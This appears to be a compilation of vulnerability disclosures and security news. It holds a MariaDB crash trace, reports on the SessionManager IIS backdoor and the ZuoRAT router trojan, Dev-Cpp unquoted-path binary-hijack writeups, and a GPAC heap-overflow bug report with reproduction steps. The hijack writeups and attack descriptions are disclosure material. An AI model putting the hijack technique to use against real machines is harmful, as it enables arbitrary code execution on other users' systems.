Optimizer switch: index\_merge=on,index\_merge\_union=on,index\_merge\_sort\_union=on,index\_merge\_intersection=on,index\_merge\_sort\_intersection=off,engine\_condition\_pushdown=off,index\_condition\_pushdown=on,derived\_merge=on,derived\_with\_keys=on,firstmatch=on,loosescan=on,materialization=on,in\_to\_exists=on,semijoin=on,partial\_match\_rowid\_merge=on,partial\_match\_table\_scan=on,subquery\_cache=on,mrr=off,mrr\_cost\_based=off,mrr\_sort\_keys=off,outer\_join\_with\_cache=on,semijoin\_with\_cache=on,join\_cache\_incremental=on,join\_cache\_hashed=on,join\_cache\_bka=on,optimize\_join\_buffer\_size=on,table\_elimination=on,extended\_keys=on,exists\_to\_in=on,orderby\_uses\_equalities=on,condition\_pushdown\_for\_derived=on,split\_materialized=on,condition\_pushdown\_for\_subquery=on,rowid\_filter=on,condition\_pushdown\_from\_having=on,not\_null\_range\_scan=off

The manual page at https://mariadb.com/kb/en/how-to-produce-a-full-stack-trace-for-mysqld/ contains

information that should help you find out what is causing the crash.

Writing a core file...

Working directory at /home/fuboat/mariadb-tmp/5

Resource Limits:

Limit                     Soft Limit           Hard Limit           Units     

Max cpu time              unlimited            unlimited            seconds   

Max file size             unlimited            unlimited            bytes     

Max data size             unlimited            unlimited            bytes     

Max stack size            8388608              unlimited            bytes     

Max core file size        unlimited            unlimited            bytes     

Max resident set          unlimited            unlimited            bytes     

Max processes             61608                61608                processes 

Max open files            524288               524288               files     

Max locked memory         65536                65536                bytes     

Max address space         unlimited            unlimited            bytes     

Max file locks            unlimited            unlimited            locks     

Max pending signals       61608                61608                signals   

Max msgqueue size         819200               819200               bytes     

Max nice priority         0                    0                    

Max realtime priority     0                    0                    

Max realtime timeout      unlimited            unlimited            us        

Core pattern: core

Using host libthread\_db library "/usr/lib/libthread\_db.so.1".

Core was generated by \`/usr/local/mysql/bin//mysqld --port 10005 --datadir=/home/fuboat/mariadb-tmp/5'.

Program terminated with signal SIGABRT, Aborted.

#0  0x00007f9fe96e6808 in pthread\_kill () from /usr/lib/libpthread.so.0

#1  0x000055613803a06b in handle\_fatal\_signal (sig=<optimized out>) at /experiment/mariadb-server/sql/signal\_handler.cc:344

#2  <signal handler called>

#3  0x00007f9fe91c8d22 in raise () from /usr/lib/libc.so.6

#4  0x00007f9fe91b2862 in abort () from /usr/lib/libc.so.6

#5  0x00007f9fe9552802 in \_\_gnu\_cxx::\_\_verbose\_terminate\_handler () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/vterminate.cc:95

#6  0x00007f9fe955ec8a in \_\_cxxabiv1::\_\_terminate (handler=<optimized out>) at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:48

#7  0x00007f9fe955ecf7 in std::terminate () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/eh\_terminate.cc:58

#8  0x00007f9fe955fa75 in \_\_cxxabiv1::\_\_cxa\_pure\_virtual () at /build/gcc/src/gcc/libstdc++-v3/libsupc++/pure.cc:50

#9  0x00005561380a4308 in Item::check\_type\_scalar (this=this@entry=0x629000089440, opname=...) at /experiment/mariadb-server/sql/item.cc:1121

#10 0x00005561381e2a5b in Item\_func::check\_argument\_types\_scalar (this=0x6190000a3ed8, start=<optimized out>, end=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:271

#11 0x00005561381ce34e in Item\_func::fix\_fields (this=this@entry=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_func.cc:357

#12 0x0000556138100700 in Item\_func\_case::fix\_fields (this=0x6190000a3ed8, thd=<optimized out>, ref=<optimized out>) at /experiment/mariadb-server/sql/item\_cmpfunc.cc:3131

#13 0x0000556137be6ee2 in fix\_vcol\_expr (thd=<optimized out>, vcol=0x61d0000532b8) at /experiment/mariadb-server/sql/table.cc:3588

#14 0x000055613775e1ca in TABLE::fix\_vcol\_exprs (this=0x6190000a3298, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5429

#15 0x000055613775ef93 in fix\_all\_session\_vcol\_exprs (tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.cc:5465

#16 lock\_tables (thd=thd@entry=0x62b0000bd218, tables=0x6290000873b8, count=<optimized out>, flags=flags@entry=0) at /experiment/mariadb-server/sql/sql\_base.cc:5649

#17 0x0000556137763800 in open\_and\_lock\_tables (thd=thd@entry=0x62b0000bd218, options=..., tables=<optimized out>, tables@entry=0x6290000873b8, derived=derived@entry=true, flags=flags@entry=0, prelocking\_strategy=prelocking\_strategy@entry=0x7f9fca4512d0) at /experiment/mariadb-server/sql/sql\_base.cc:5261

#18 0x0000556137819ef4 in open\_and\_lock\_tables (flags=0, derived=true, tables=0x6290000873b8, thd=0x62b0000bd218) at /experiment/mariadb-server/sql/sql\_base.h:509

#19 mysql\_insert (thd=thd@entry=0x62b0000bd218, table\_list=0x6290000873b8, fields=..., values\_list=..., update\_fields=..., update\_values=..., duplic=<optimized out>, ignore=<optimized out>, result=<optimized out>) at /experiment/mariadb-server/sql/sql\_insert.cc:757

#20 0x00005561378d2bb8 in mysql\_execute\_command (thd=0x62b0000bd218, is\_called\_from\_prepared\_stmt=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:4565

#21 0x00005561378df5a1 in mysql\_parse (thd=0x62b0000bd218, rawbuf=<optimized out>, length=<optimized out>, parser\_state=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:8030

#22 0x00005561378e560c in dispatch\_command (command=<optimized out>, thd=0x62b0000bd218, packet=<optimized out>, packet\_length=<optimized out>, blocking=<optimized out>) at /experiment/mariadb-server/sql/sql\_parse.cc:1896

#23 0x00005561378ea73d in do\_command (thd=0x62b0000bd218, blocking=blocking@entry=true) at /experiment/mariadb-server/sql/sql\_parse.cc:1404

#24 0x0000556137ca5e57 in do\_handle\_one\_connection (connect=<optimized out>, put\_in\_cache=<optimized out>) at /experiment/mariadb-server/sql/sql\_connect.cc:1418

#25 0x0000556137ca633d in handle\_one\_connection (arg=arg@entry=0x6080000023b8) at /experiment/mariadb-server/sql/sql\_connect.cc:1312

#26 0x0000556138736c2c in pfs\_spawn\_thread (arg=0x617000005f18) at /experiment/mariadb-server/storage/perfschema/pfs.cc:2201

#27 0x00007f9fe96df259 in start\_thread () from /usr/lib/libpthread.so.0

#28 0x00007f9fe928a5e3 in clone () from /usr/lib/libc.so.6

CVE-2022-32087: [MDEV-26437] Server crashes in Item_args::walk_args

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.
Dubbed SessionManager, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after

A newly discovered malware has been put to use in the wild at least since March 2021 to backdoor Microsoft Exchange servers belonging to a wide range of entities worldwide, with infections lingering in 20 organizations as of June 2022.

Dubbed **SessionManager**, the malicious tool masquerades as a module for Internet Information Services (IIS), a web server software for Windows systems, after exploiting one of the ProxyLogon flaws within Exchange servers.

Targets included 24 distinct NGOs, government, military, and industrial organizations spanning Africa, South America, Asia, Europe, Russia and the Middle East. A total of 34 servers have been compromised by a SessionManager variant to date.

This is far from the first time the technique has been observed in real-world attacks. The use of a rogue IIS module as a means to distribute stealthy implants mirrors the tactics of a credential stealer called Owowa that came to light in December 2021.

"Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a targeted organization; be it to collect emails, update further malicious access, or clandestinely manage compromised servers that can be leveraged as malicious infrastructure," Kaspersky researcher Pierre Delcher said.

The Russian cybersecurity firm attributed the intrusions with medium-to-high confidence to an adversary tracked as Gelsemium, citing overlaps in the malware samples linked to the two groups and victims targeted.

ProxyLogon, since its disclosure in March 2021, has attracted the repeated attention of several threat actors, and the latest attack chain is no exception, with the Gelsemium crew exploiting the flaws to drop SessionManager, a backdoor coded in C++ and is engineered to process HTTP requests sent to the server.

"Such malicious modules usually expect seemingly legitimate but specifically crafted HTTP requests from their operators, trigger actions based on the operators' hidden instructions if any, then transparently pass the request to the server for it to be processed just like any other request," Delcher explained.

Said to be a "lightweight persistent initial access backdoor," SessionManager comes with capabilities to read, write, and delete arbitrary files; execute binaries from the server; and establish communications with other endpoints in the network.

The malware further acts as a covert channel to conduct reconnaissance, gather in-memory passwords, and deliver additional tools such as Mimikatz as well as a memory dump utility from Avast.

The findings come as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) urged government agencies and private sector entities using the Exchange platform to switch from the legacy Basic Authentication method to Modern Authentication alternatives prior to its deprecation on October 1, 2022.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'SessionManager' Backdoor Targeting Microsoft IIS Servers in the Wild

Researchers say the remote-access Trojan ZuoRAT is likely the work of a nation-state and has infected at least 80 different targets.

An unusually advanced hacking group has spent almost two years infecting a wide range of routers in North America and Europe with malware that takes full control of connected devices running Windows, macOS, and Linux, researchers reported on June 28.

So far, researchers from Lumen Technologies' Black Lotus Labs say they've identified at least 80 targets infected by the stealthy malware, including routers made by Cisco, Netgear, Asus, and DrayTek. Dubbed ZuoRAT, the remote access Trojan is part of a broader hacking campaign that has existed since at least the fourth quarter of 2020 and continues to operate.

A High Level of Sophistication

The discovery of custom-built malware written for the MIPS architecture and compiled for small-office and home-office routers is significant, particularly given its range of capabilities. Its ability to enumerate all devices connected to an infected router and collect the DNS lookups and network traffic they send and receive and remain undetected is the hallmark of a highly sophisticated threat actor.

"While compromising SOHO routers as an access vector to gain access to an adjacent LAN is not a novel technique, it has seldom been reported," Black Lotus Labs researchers wrote. "Similarly, reports of person-in-the-middle style attacks, such as DNS and HTTP hijacking, are even rarer and a mark of a complex and targeted operation. The use of these two techniques congruently demonstrated a high level of sophistication by a threat actor, indicating that this campaign was possibly performed by a state-sponsored organization."

The campaign comprises at least four pieces of malware, three of them written from scratch by the threat actor. The first piece is the MIPS-based ZuoRAT, which closely resembles the Mirai internet-of-things malware that achieved record-breaking distributed denial-of-service attacks that crippled some Internet services for days. ZuoRAT often gets installed by exploiting unpatched vulnerabilities in SOHO devices.

Once installed, ZuoRAT enumerates the devices connected to the infected router. The threat actor can then use DNS hijacking and HTTP hijacking to cause the connected devices to install other malware. Two of those malware pieces—dubbed CBeacon and GoBeacon—are custom-made, with the first written for Windows in C++ and the latter written in Go for cross-compiling on Linux and macOS devices. For flexibility, ZuoRAT can also infect connected devices with the widely used Cobalt Strike hacking tool.

ZuoRAT can pivot infections to connected devices using one of two methods:

*   DNS hijacking, which replaces the valid IP addresses corresponding to a domain such as Google or Facebook with a malicious one operated by the attacker.
*   HTTP hijacking, in which the malware inserts itself into the connection to generate a 302 error that redirects the user to a different IP address.

Intentionally Complex

Black Lotus Labs said the command-and-control infrastructure used in the campaign is intentionally complex in an attempt to conceal what's happening. One set of infrastructure is used to control infected routers, and another is reserved for the connected devices if they're later infected.

The researchers observed routers from 23 IP addresses with a persistent connection to a control server that they believe was performing an initial survey to determine if the targets were of interest. A subset of those 23 routers later interacted with a Taiwan-based proxy server for three months. A further subset of routers rotated to a Canada-based proxy server to obfuscate the attacker's infrastructure.

The researchers wrote:

_Black Lotus Labs visibility indicates ZuoRAT and the correlated activity represent a highly targeted campaign against US and Western European organizations that blends in with typical internet traffic through obfuscated, multistage C2 infrastructure, likely aligned with multiple phases of the malware infection. The extent to which the actors take pains to hide the C2 infrastructure cannot be overstated. First, to avoid suspicion, they handed off the initial exploit from a dedicated virtual private server (VPS) that hosted benign content. Next, they leveraged routers as proxy C2s that hid in plain sight through router-to-router communication to further avoid detection. And finally, they rotated proxy routers periodically to avoid detection._

The discovery of this ongoing campaign is the most important one affecting SOHO routers since VPNFilter, the router malware created and deployed by the Russian government that was discovered in 2018. Routers are often overlooked, particularly in the work-from-home era. While organizations often have strict requirements for what devices are allowed to connect, few mandate patching or other safeguards for the devices' routers.

Like most router malware, ZuoRAT can't survive a reboot. Simply restarting an infected device will remove the initial ZuoRAT exploit, consisting of files stored in a temporary directory. To fully recover, however, infected devices should be factory reset. Unfortunately, in the event connected devices have been infected with the other malware, they can't be disinfected so easily.

_This story originally appeared on_ _Ars Technica__._

A New, Remarkably Sophisticated Malware Is Attacking Routers

The malware has been in circulation since 2020, with sophisticated, advanced malicious actors taking advantage of the vulnerabilities in SOHO routers as the work-from-home population expands rapidly.

Security researchers have discovered a multi-stage remote access Trojan (RAT) currently being used against a wide range of small office-home office (SOHO) routers in Europe and North America — potentially the work of a state-sponsored actor.

Researchers believe that at least 80 victims have been infected so far during the campaign.

The malware, known as ZuoRAT, has been active since 2020, according to the Black Lotus Labs, the threat intelligence arm of Lumen Technologies.

According to the report, the malware makes its way onto the routers through exploits for known vulnerabilities. It can also infect other devices in the network and introduce additional malware via DNS and HTTP hijacking.

"ZuoRAT is a MIPS file compiled for SOHO routers that can enumerate a host and internal LAN, capture packets being transmitted over the infected device, and perform person-in-the-middle attacks (DNS and HTTPS hijacking based on predefined rules)," Lumen's threat intelligence team wrote in a blog post on the malware.

**Trojan Targets Cisco, Netgear Routers**

The malware targets routers from Cisco, Netgear, Asus, and DrayTek.

"The device types consisted of, but were not limited to: Cisco RV 320, 325 and 420; Asus RT-AC68U, RT-AC530, RT-AC68P and RT-AC1900U; DrayTek Vigor 3900 and unspecified NETGEAR devices," according to the analysis.

The research team noted that while compromising SOHO routers as an access vector to gain access to an adjacent LAN is not a novel technique, it has seldom been reported.

"Reports of person-in-the-middle style attacks, such as DNS and HTTP hijacking, are \[rare\] and a mark of a complex and targeted operation," the post continued. "The use of these two techniques congruently demonstrated a high level of sophistication by a threat actor, indicating that this campaign was possibly performed by a state-sponsored organization."

From the perspective of Danny Adamitis, principal information security engineer for Lumen Black Lotus Labs, the sophistication of this campaign cannot be overstated, especially the ability to enumerate infected devices and the LANs they are connected to, and packet-capture network traffic for additional targeting.

"Moreover, the multi-stage campaign includes multiple fully functional Trojans, as well as complex and covert C2 and proxy C2 infrastructure to obfuscate command-and-control and evade detection, which is why it went undetected for nearly two years," he adds.

**Other Trojans Found on Hacked Devices**

To Adamitis' point, the researchers found two other Trojans on the hacked devices. One was based on C++ and targeted Windows workstations. The other Trojan was based on the Go programming language and attacked Linux and macOS as well as Windows.

Among other things, they allowed the attackers to start new processes, gain permanent access to infected systems, intercept network traffic, and upload or download arbitrary files.

**Shift to Secure the Home Office**

According to a recent survey, nearly a quarter of the respondents (23%) named securing the remote workforce as their top priority for 2022. Routers are an important part of that, as they act as central waypoints for the rest of the home IT footprint.

"Once you are on the router you have a full trusted connection to poke and prod at whatever device is connected to it," Dahvid Schloss, offensive security team lead at Echelon, said via email. "From there, you could attempt to use proxychains to throw exploits into the network or just monitor all the traffic going in, out, and around the network."

So, as part of the work-from-home shift, some major vendors are moving their security focus, such as HP, which helps admins secure work-from-home endpoints by extending cloud security management that can remotely track, detect, and self-heal remote company devices.

"The consumer router space is ripe for targeting because these devices reside outside of the traditional security perimeter, and they are rarely monitored or patched," Adamitis adds. "This is only exacerbated by the rapid shift to remote work at the start of the pandemic."

Alex Ondrick, director of security operations at incident-response specialist BreachQuest, says a general lack of security controls for consumer-grade routers, and difficulties in "force" patching/update for them, makes SOHO routers particularly vulnerable.

"If a SOHO router is unpatched or vulnerable to known security flaws, ZuoRAT poses a dangerous combination of reconnaissance and authentication-bypass exploit script and lateral-movement capabilities," he explains.

**Bolstering the Human Firewall**

Ondrick adds that the SOHO router threat is an opportunity for organizations to expand their security awareness programs and spread valuable improved security measures among their users.

"Educating users on how to protect their home networks, their passwords, their financial information, and their families increases their engagement and builds cybersecurity hygiene and acumen they take back to the office, and reduces the organization's attack surface and builds the better human firewall," he says.

He says SOHO users should regularly update their router's firmware and ensure their devices are behind multiple layers of security (defense-in-depth) wherever possible.

For home routers, he says it's important to leverage the vendor's built-in security capabilities alongside host-based network security wherever possible.

"Think of your home router as 'yet another' device which should be regularly updated and think of it as the 'first line of defense' between you and the public-facing Internet," he says. "Pending any leaps forward in SOHO router security, consider adding a recurring biannual reminder on your phone or calendar to check for updates on your router's firmware."

ZuoRAT Hijacks SOHO Routers From Cisco, Netgear

A binary hijack in Orwell-Dev-Cpp v5.11 allows attackers to execute arbitrary code via a crafted .exe file.

**Orwell-Dev-Cpp CreateProcessW Misuse Binary Hijack****Basic Info**

**Software name**：Orwell dev-cpp

**download**：https://sourceforge.net/projects/orwelldevcpp/

**Vuln Version**：v5.11and before

**Description**：When users run Dev-cpp in windows, we can see that it will try to run C:\\Program.exe, if C:\\Program.exe not exists, then it will run C:\\Program Files (x86)\\MingGW64\\bin\\gcc.exe. So an attacker can put C:\\Program.exe in C:, and it will execute arbitrary code when other users run Dev-Cpp.

**Analyse**

When we start devcpp.exe in windows, we can see that it will try to start process C:\Program Files (x86)\MingGW64\bin\gcc.exe with CreateProcessA

This vuln occured because the developer misuse CreateProcesAs API in AcGeneral.dll .

So an attacker which have write permission of C:\\ can place binary named C:\\Program.exe. And it will be executed when embarcadero dev-cpp started.

**Proof of Concept**

Poc Vedio

CVE-2022-33037: Vuln/Orwell-Dev-Cpp-CreateProcessA-Misuse-Binary-Hijack.md at main · ycdxsb/Vuln

A binary hijack in Embarcadero Dev-CPP v6.3 allows attackers to execute arbitrary code via a crafted .exe file.

**Embarcadero-Dev-Cpp CreateProcessW Misuse Binary Hijack****Basic Info**

**Software name**：embarcadero dev-cpp

**download**：https://github.com/Embarcadero/Dev-Cpp

**Vuln Version**：v6.3 and before

**Description**：When users run Dev-cpp in windows, we can see that it will try to run C:\\Program.exe, if C:\\Program.exe not exists, then it will run C:\\Program Files (x86)\\Embarcadero\\Dev-Cpp\\TDM-GCC-64\\bin\\gcc.exe. So an attacker can put C:\\Program.exe in C:, and it will execute arbitrary code when other users run Dev-Cpp.

**Analyse**

When we start devcpp.exe in windows, we can see that it will try to start process C:\Program Files (x86)\Embarcadero\Dev-cpp\TDM-GCC-64\bin\gcc.exe with CreateProcessW

This vuln occured because the developer misuse CreateProcess API. We can find it by the call stack.

An attacker which have write permission of C:\\ can place binary named C:\\Program.exe. And it will be executed when embarcadero dev-cpp started.

**Proof of Concept**

Poc Vedio

CVE-2022-33036: Vuln/Embarcadero-Dev-Cpp-CreateProcessW-Misuse-Binary-Hijack.md at main · ycdxsb/Vuln

The GetHintFormat function in GPAC 1.0.1 allows attackers to cause a denial of service via a crafted file in the MP4Box command.

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...).

It's a heap-buffer-overflow bug

Step to reproduce:  
1.get latest commit code (GPAC version 1.1.0-DEV-rev1170-g592ba26-master)  
2.compile with --enable-sanitizer  
3.run ./MP4BOX info poc

Env:  
Ubunut 20.04 , clang 12.0.1

ASAN report

    ==2275020==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000638 at pc 0x7f1c17ca68a4 bp 0x7ffd52eab1d0 sp 0x7ffd52eab1c8
    READ of size 4 at 0x604000000638 thread T0
        #0 0x7f1c17ca68a3 in GetHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22
        #1 0x7f1c17ca68a3 in CheckHintFormat /home/lly/pro/gpac_public/src/isomedia/hint_track.c:58:6
        #2 0x7f1c17ca68a3 in gf_isom_get_payt_count /home/lly/pro/gpac_public/src/isomedia/hint_track.c:979:7
        #3 0x5b52e5 in DumpTrackInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3178:14
        #4 0x5e4af1 in DumpMovieInfo /home/lly/pro/gpac_public/applications/mp4box/filedump.c:3789:3
        #5 0x52ea16 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:6023:9
        #6 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #7 0x429aad in _start (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x429aad)
    
    0x604000000638 is located 0 bytes to the right of 40-byte region [0x604000000610,0x604000000638)
    allocated by thread T0 here:
        #0 0x4a496d in malloc (/home/lly/pro/gpac_public/bin/gcc/MP4Box+0x4a496d)
        #1 0x7f1c17543a17 in nmhd_box_new /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:4651:2
        #2 0x7f1c1775de4f in gf_isom_box_new_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1673:6
        #3 0x7f1c17756209 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:239:12
        #4 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7
        #5 0x7f1c1751e43a in minf_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3527:6
        #6 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9
        #7 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14
        #8 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7
        #9 0x7f1c17511b3d in mdia_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:3078:6
        #10 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9
        #11 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14
        #12 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7
        #13 0x7f1c17582c10 in trak_box_read /home/lly/pro/gpac_public/src/isomedia/box_code_base.c:6734:6
        #14 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9
        #15 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14
        #16 0x7f1c17760a0b in gf_isom_box_array_read_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1707:7
        #17 0x7f1c17757fe8 in gf_isom_box_read /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:1810:9
        #18 0x7f1c17757fe8 in gf_isom_box_parse_ex /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:263:14
        #19 0x7f1c177548b9 in gf_isom_parse_root_box /home/lly/pro/gpac_public/src/isomedia/box_funcs.c:38:8
        #20 0x7f1c177e2347 in gf_isom_parse_movie_boxes_internal /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:320:7
        #21 0x7f1c177e2347 in gf_isom_parse_movie_boxes /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:781:6
        #22 0x7f1c177f84d3 in gf_isom_open_file /home/lly/pro/gpac_public/src/isomedia/isom_intern.c:901:19
        #23 0x53c4b8 in mp4boxMain /home/lly/pro/gpac_public/applications/mp4box/main.c:5841:12
        #24 0x7f1c15d710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/lly/pro/gpac_public/src/isomedia/hint_track.c:46:22 in GetHintFormat
    Shadow bytes around the buggy address:
      0x0c087fff8070: fa fa 00 00 00 00 04 fa fa fa 00 00 00 00 00 00
      0x0c087fff8080: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
      0x0c087fff8090: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
      0x0c087fff80a0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
      0x0c087fff80b0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
    =>0x0c087fff80c0: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 00 00
      0x0c087fff80d0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
      0x0c087fff80e0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
      0x0c087fff80f0: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
      0x0c087fff8100: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 00
      0x0c087fff8110: fa fa 00 00 00 00 00 00 fa fa 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    
    

poc.zip

Tag

#c++